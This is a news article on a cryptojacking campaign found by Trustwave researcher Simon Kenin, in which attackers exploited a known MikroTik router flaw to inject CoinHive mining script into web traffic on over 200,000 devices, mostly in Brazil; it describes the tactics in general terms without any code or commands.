CoinHive Mining Attack Using MikroTik Routers Affects over 200,000 Devices

What could have been a low-scale website compromise was found to be a massive cryptojack attack. Simon Kenin, a security researcher at Trustwave, had just returned from presenting a talk at RSA Asia 2018 about cyber criminals and the use of cryptocurrencies for malicious activities. Call it coincidence but immediately after returning to his office, he noticed a massive surge of CoinHive, and upon further inspection, he found it to be specifically associated with MikroTik network devices and heavily targeting Brazil.  When Kenin delved deeper into the research of this occurrence, he found that over 70,000 MikroTik devices were exploited in this attack, a number which has since risen to 200,000.

Shodan search of MikroTik devices in Brazil with CoinHive yielded 70,000+ results.Simon Kenin / Trustwave

“This could be a bizarre coincidence, but on further inspection I saw that all of these devices were using the same CoinHive sitekey, meaning that they all ultimately mine into the hands of one entity. I looked for the CoinHive site-key used on those devices, and saw that the attacker indeed mainly focused on Brazil.”

Shodan search of the CoinHive sitekey showed that all exploits were yielding to the same attacker. Simon Kenin / Trustwave

Kenin initially suspected the attack to be a zero-day exploit against MikroTik, but he later realized that the attackers were exploiting a known vulnerability in the routers to carry out this activity. This vulnerability was registered, and a patch was issued on the 23rd of April to mitigate its security risks but like most such updates, the release was ignored and many routers were operating on the vulnerable firmware. Kenin found hundreds of thousands of such outdated routers around the world, tens of thousands which he discovered were in Brazil.

Previously, the vulnerability was found to allow remote malicious code execution on the router. This latest attack, however, managed to take this a step further by using this mechanism to “inject the CoinHive script into every web page that a user visited.” Kenin also noted that the attackers employed three tactics that enhanced the brutality of the attack. A CoinHive script backed error page was created that ran the script every single time a user encountered an error while browsing. In addition to this, the script impacted visitors to distinct websites with or without the MikroTik routers (although the routers were the means of injecting this script in the first place). The attacker was also found to utilize a MiktoTik.php file that is programmed to inject CoinHive into every html page.

As many Internet Service Providers (ISPs) use MikroTik routers to provide web connectivity on a mass scale for enterprises, this attack is a considered to be a high-level threat that wasn’t made to target unsuspecting users at home but to cast a massive blow to large firms and enterprises. What’s more is that the attacker installed a “u113.src” script on the routers which allowed him/her to download other commands and code later. This allows the hacker to maintain the stream of access through the routers and run standby alternative scripts in case the original site key is blocked by CoinHive.